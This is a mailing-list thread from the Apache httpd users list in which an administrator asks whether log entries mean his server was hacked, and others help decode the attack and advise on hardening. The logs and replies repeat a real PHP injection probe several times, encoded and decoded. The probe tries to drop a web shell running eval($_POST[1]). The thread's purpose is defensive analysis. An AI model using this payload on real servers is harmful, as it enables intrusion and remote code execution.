Re: [users@httpd] am i hacked ?
with the current number of critters around probably yes. E On 6 February 2017 at 23:05, Wim Lewiswrote: > > On 2/6/2017 8:36 AM, Jack Swan wrote: > > What upsets me is that these two requests have statuscode 200, which > mean it was successfull. > > As Jonesy points out, it's normal for the web server to simply ignore a > request's query-string in a request where it wouldn't mean anything. So > Apache is happily returning the result of "GET /" and ignoring the > malicious probe. > > If you don't have PHP installed, you're safe from whatever this is. If the > user your webserver runs as can't write to the documentroot or > configuration directory, you're safe from whatever this is. > > > > - > To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org > For additional commands, e-mail: users-h...@httpd.apache.org > >
Re: [users@httpd] am i hacked ?
On 2/6/2017 8:36 AM, Jack Swan wrote: > What upsets me is that these two requests have statuscode 200, which mean it > was successfull. As Jonesy points out, it's normal for the web server to simply ignore a request's query-string in a request where it wouldn't mean anything. So Apache is happily returning the result of "GET /" and ignoring the malicious probe. If you don't have PHP installed, you're safe from whatever this is. If the user your webserver runs as can't write to the documentroot or configuration directory, you're safe from whatever this is. - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
If you have python installed... The following python script shows some simple commands for decoding (for future reference). test =""" /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > HTTP/1.1" 200 90 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > HTTP/1.1" 200 90""" import urllib.parse print(urllib.parse.unquote(test)) import base64 print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+')) It yields... python unquote.py /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME > NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; > HTTP/1.1" 200 90 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET > /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME > NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; > HTTP/1.1" 200 90 b'' I also have a program that attempts to get an email address to notify in the event of abuse. It yields the following. python getAbuseEmail.py 91.200.12.33 ['n...@lugalink.net'] though it is unlikely you'll get a response ;-) On 2/6/2017 8:36 AM, Jack Swan wrote: I didn't decode it all. I'll leave the rest up to you, but the %characters are hexadecimal characters. Look up hex charset. So the first line translates to (I may have missed a char or two...) GET/?1=@ini_set("display_errors", 0);set_time_limit("0");@set_magic_quotes_runtime();echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; - Original Message - From: bernd.len...@helmholtz-muenchen.de To: users@httpd.apache.org Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern Subject: [users@httpd] am i hacked ? Hi, just in the moment i found two very weird entries in may access_log: 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90 What upsets me is that these two requests have statuscode 200, which mean it was successfull. The IP is from ukraine. Where can i find out what these %charcacters mean ? Does anyone understand what happened here ? It's apache 2.2.3 64bit. Thanks for any hint. Bernd - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
- On Feb 6, 2017, at 8:22 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: >> OK. I think i understand most of it. >> First the attacker sets some values appropriate for him. Then he tries to >> create >> a file webconfig.txt.php and to write >> in it. >> Fortunately wwwrun can't write in /sr/www ... , following >> http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago. >> If he could create the file, then he is able to sent arbitrary stuff to it >> which >> is executed by eval. >> >> Some things are still unclear for me: >> >> What is the purpose of the two echos ? >> Why has the request status code 200 ? >> What is the purpose of the 1 direct behind the question mark ? >> What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm >> not >> a php developer). >> > > The @ in front of the function calls silence the errors: > http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in > Beside keeping apache and the OS fresh, what do you think of mod_security and/or AppArmor as an additional layer of security ? I read that mod_security is quite complicated. Bernd Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
> OK. I think i understand most of it. > First the attacker sets some values appropriate for him. Then he tries to > create > a file webconfig.txt.php and to write > in it. > Fortunately wwwrun can't write in /sr/www ... , following > http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago. > If he could create the file, then he is able to sent arbitrary stuff to it > which > is executed by eval. > > Some things are still unclear for me: > > What is the purpose of the two echos ? > Why has the request status code 200 ? > What is the purpose of the 1 direct behind the question mark ? > What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm > not > a php developer). > The @ in front of the function calls silence the errors: http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in Bernd Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
- On Feb 6, 2017, at 6:32 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: > - On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote: > >> The first line is trying to create the file webconfig.txt.php in your >> DOCUMENT_ROOT directory, with the contents of the file being: >> >> >> >> I didn't decode the remaining lines. I think they're just trying to do the >> same >> thing. >> >> > > You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is > helpful. > > OK. I think i understand most of it. First the attacker sets some values appropriate for him. Then he tries to create a file webconfig.txt.php and to write in it. Fortunately wwwrun can't write in /sr/www ... , following http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago. If he could create the file, then he is able to sent arbitrary stuff to it which is executed by eval. Some things are still unclear for me: What is the purpose of the two echos ? Why has the request status code 200 ? What is the purpose of the 1 direct behind the question mark ? What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm not a php developer). Bernd Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
On Mon, Feb 6, 2017 at 12:30 PM, Mitchell Krogwrote: > I see these type of attack strings all the time on Nginx except Nginx gives > a 403. Apache is notoriously bad with security and giving 200 ok responses > makes you yourself. A reason I and many other people have switched. > User support on this list was also non existent when I ran into serious SSL > problems with 2.4 that until today have been ignored and unanswered. Was this your serious problem: I am hoping someone can please give me a more concise description of what the socache_shmcb module is and what it actually does. The documentation at https://httpd.apache.org/docs/2.4/mod/mod_socache_shmcb.html is very vague and in 2 years has not changed. Google searches do not reveal much information other than people on forums saying enable the module for better performance and what not. I just cannot get my head around what it is actually really designed to do and if one was to use it how to configure it. Guess as I said it will first help to know what it actually is. - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
- On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote: > The first line is trying to create the file webconfig.txt.php in your > DOCUMENT_ROOT directory, with the contents of the file being: > > > > I didn't decode the remaining lines. I think they're just trying to do the > same > thing. > > You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is helpful. Bernd Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
I see these type of attack strings all the time on Nginx except Nginx gives a 403. Apache is notoriously bad with security and giving 200 ok responses makes you yourself. A reason I and many other people have switched. User support on this list was also non existent when I ran into serious SSL problems with 2.4 that until today have been ignored and unanswered. On 06 Feb 2017 19:21, "Ken Robinson"wrote: > > > On 2017-02-06 12:08 pm, Lentes, Bernd wrote: > > The first line is trying to create the file webconfig.txt.php in your >>> DOCUMENT_ROOT directory, with the contents of the file being: >>> >>> >>> >>> I didn't decode the remaining lines. I think they're just trying to do >>> the same >>> thing. >>> >> >> Fortunately there is no webconfig.txt.php. And all folders in /srv/www >> belongs to root and user wwwrun >> is not allowed to write there. >> > > What seems to be happening here is that your system is being probed for > vulnerabilities. > > The attacker is sending a payload string to your index.php file in hopes > that it will not complain and write the string to the file > webconfig.txt.php which the attacker would then attempt to get to with the > real hack in the Posted contents. Are there any requests to get to that > file? > > You should make sure you sanitized any input to your index.php and reject > anything that's not expected. > > Ken > > - > To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org > For additional commands, e-mail: users-h...@httpd.apache.org > >
Re: [users@httpd] am i hacked ?
On 2017-02-06 12:08 pm, Lentes, Bernd wrote: The first line is trying to create the file webconfig.txt.php in your DOCUMENT_ROOT directory, with the contents of the file being: I didn't decode the remaining lines. I think they're just trying to do the same thing. Fortunately there is no webconfig.txt.php. And all folders in /srv/www belongs to root and user wwwrun is not allowed to write there. What seems to be happening here is that your system is being probed for vulnerabilities. The attacker is sending a payload string to your index.php file in hopes that it will not complain and write the string to the file webconfig.txt.php which the attacker would then attempt to get to with the real hack in the Posted contents. Are there any requests to get to that file? You should make sure you sanitized any input to your index.php and reject anything that's not expected. Ken - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
> The first line is trying to create the file webconfig.txt.php in your > DOCUMENT_ROOT directory, with the contents of the file being: > > > > I didn't decode the remaining lines. I think they're just trying to do the > same > thing. > Fortunately there is no webconfig.txt.php. And all folders in /srv/www belongs to root and user wwwrun is not allowed to write there. Bernd Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
- On Feb 6, 2017, at 5:45 PM, Daniel dferra...@gmail.com wrote: > Actually now that I re-read the requests it also looks as shellshock succesful > attempt. > Operative system software not updated recently either? > 2017-02-06 17:42 GMT+01:00 Daniel < dferra...@gmail.com > : >> Have you tried to send those requests yourself and see what you get? >> Still those requests seem to be aimed at your php framework. >> Do you use a very old php version as well? Everything is old. php, OS, apache. This is to my account. It's a system i nearly oversaw, because we use it very rarely. But nevertheless, it should be updated. I know. And i learn. >>> What i find out already: >>> https://url-encoder.de/ helped me to decode the URL: >>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo >>> '->|';file_put_contents($_SERVER['DOCUME >>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo >>> '|<-'; >>> Currently i don't understand what this means. >>> I don't find a file webconfig.txt.php on my system. >>> Currently no weird process, no new user in /etc/passwd, no packtes to the >>> network which includes this ip. >>> Thankful for any tip. Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
The first line is trying to create the file webconfig.txt.php in your DOCUMENT_ROOT directory, with the contents of the file being: I didn't decode the remaining lines. I think they're just trying to do the same thing. - Original Message - From: bernd.len...@helmholtz-muenchen.de To: users@httpd.apache.org Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern Subject: Re: [users@httpd] am i hacked ? - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: > Hi, > > just in the moment i found two very weird entries in may access_log: > > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > HTTP/1.1" 200 90 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > HTTP/1.1" 200 90 > > What upsets me is that these two requests have statuscode 200, which mean it > was > successfull. > The IP is from ukraine. Where can i find out what these %charcacters mean ? > Does > anyone understand what happened here ? It's apache 2.2.3 64bit. > > Thanks for any hint. > > Bernd > What i find out already: https://url-encoder.de/ helped me to decode the URL: /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; Currently i don't understand what this means. I don't find a file webconfig.txt.php on my system. Currently no weird process, no new user in /etc/passwd, no packtes to the network which includes this ip. Thankful for any tip. Bernd Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
Actually now that I re-read the requests it also looks as shellshock succesful attempt. Operative system software not updated recently either? 2017-02-06 17:42 GMT+01:00 Daniel: > Have you tried to send those requests yourself and see what you get? > > Still those requests seem to be aimed at your php framework. > > Do you use a very old php version as well? > > 2017-02-06 17:41 GMT+01:00 Lentes, Bernd muenchen.de>: > >> >> - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz- >> muenchen.de wrote: >> >> > Hi, >> > >> > just in the moment i found two very weird entries in may access_log: >> > >> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET >> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_ >> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29% >> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME >> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27 >> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B >> > HTTP/1.1" 200 90 >> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET >> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_ >> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29% >> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME >> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27 >> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B >> > HTTP/1.1" 200 90 >> > >> > What upsets me is that these two requests have statuscode 200, which >> mean it was >> > successfull. >> > The IP is from ukraine. Where can i find out what these %charcacters >> mean ? Does >> > anyone understand what happened here ? It's apache 2.2.3 64bit. >> > >> > Thanks for any hint. >> > >> > Bernd >> > >> >> What i find out already: >> https://url-encoder.de/ helped me to decode the URL: >> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo >> '->|';file_put_contents($_SERVER['DOCUME >> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo >> '|<-'; >> >> Currently i don't understand what this means. >> I don't find a file webconfig.txt.php on my system. >> Currently no weird process, no new user in /etc/passwd, no packtes to the >> network which includes this ip. >> >> Thankful for any tip. >> >> >> Bernd >> >> >> Helmholtz Zentrum Muenchen >> Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) >> Ingolstaedter Landstr. 1 >> 85764 Neuherberg >> www.helmholtz-muenchen.de >> Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe >> Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons >> Enhsen >> Registergericht: Amtsgericht Muenchen HRB 6466 >> USt-IdNr: DE 129521671 >> >> >> - >> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org >> For additional commands, e-mail: users-h...@httpd.apache.org >> >> > > > -- > *Daniel Ferradal* > IT Specialist > > email dferradal at gmail.com > linkedin es.linkedin.com/in/danielferradal > -- *Daniel Ferradal* IT Specialist email dferradal at gmail.com linkedin es.linkedin.com/in/danielferradal
Re: [users@httpd] am i hacked ?
Have you tried to send those requests yourself and see what you get? Still those requests seem to be aimed at your php framework. Do you use a very old php version as well? 2017-02-06 17:41 GMT+01:00 Lentes, Bernd: > > - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz- > muenchen.de wrote: > > > Hi, > > > > just in the moment i found two very weird entries in may access_log: > > > > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET > > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B% > 40set_time_limit%280%29%3B%40set_magic_quotes_runtime% > 280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28% > 27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > > HTTP/1.1" 200 90 > > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET > > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B% > 40set_time_limit%280%29%3B%40set_magic_quotes_runtime% > 280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28% > 27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > > HTTP/1.1" 200 90 > > > > What upsets me is that these two requests have statuscode 200, which > mean it was > > successfull. > > The IP is from ukraine. Where can i find out what these %charcacters > mean ? Does > > anyone understand what happened here ? It's apache 2.2.3 64bit. > > > > Thanks for any hint. > > > > Bernd > > > > What i find out already: > https://url-encoder.de/ helped me to decode the URL: > /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo > '->|';file_put_contents($_SERVER['DOCUME > NT_ROOT'].'/webconfig.txt.php',base64_decode(' > PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; > > Currently i don't understand what this means. > I don't find a file webconfig.txt.php on my system. > Currently no weird process, no new user in /etc/passwd, no packtes to the > network which includes this ip. > > Thankful for any tip. > > > Bernd > > > Helmholtz Zentrum Muenchen > Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) > Ingolstaedter Landstr. 1 > 85764 Neuherberg > www.helmholtz-muenchen.de > Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe > Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons > Enhsen > Registergericht: Amtsgericht Muenchen HRB 6466 > USt-IdNr: DE 129521671 > > > - > To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org > For additional commands, e-mail: users-h...@httpd.apache.org > > -- *Daniel Ferradal* IT Specialist email dferradal at gmail.com linkedin es.linkedin.com/in/danielferradal
Re: [users@httpd] am i hacked ?
- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: > Hi, > > just in the moment i found two very weird entries in may access_log: > > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > HTTP/1.1" 200 90 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > HTTP/1.1" 200 90 > > What upsets me is that these two requests have statuscode 200, which mean it > was > successfull. > The IP is from ukraine. Where can i find out what these %charcacters mean ? > Does > anyone understand what happened here ? It's apache 2.2.3 64bit. > > Thanks for any hint. > > Bernd > What i find out already: https://url-encoder.de/ helped me to decode the URL: /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; Currently i don't understand what this means. I don't find a file webconfig.txt.php on my system. Currently no weird process, no new user in /etc/passwd, no packtes to the network which includes this ip. Thankful for any tip. Bernd Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 - To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org
Re: [users@httpd] am i hacked ?
I didn't decode it all. I'll leave the rest up to you, but the %characters are hexadecimal characters. Look up hex charset. So the first line translates to (I may have missed a char or two...) GET/?1=@ini_set("display_errors", 0);set_time_limit("0");@set_magic_quotes_runtime();echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; - Original Message - From: bernd.len...@helmholtz-muenchen.de To: users@httpd.apache.org Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern Subject: [users@httpd] am i hacked ? Hi, just in the moment i found two very weird entries in may access_log: 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90 What upsets me is that these two requests have statuscode 200, which mean it was successfull. The IP is from ukraine. Where can i find out what these %charcacters mean ? Does anyone understand what happened here ? It's apache 2.2.3 64bit. Thanks for any hint. Bernd -- Bernd Lentes Systemadministration institute of developmental genetics Gebäude 35.34 - Raum 208 HelmholtzZentrum München bernd.len...@helmholtz-muenchen.de phone: +49 (0)89 3187 1241 fax: +49 (0)89 3187 2294 Erst wenn man sich auf etwas festlegt kann man Unrecht haben Scott Adams Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 - To unsubscribe, e-mail: 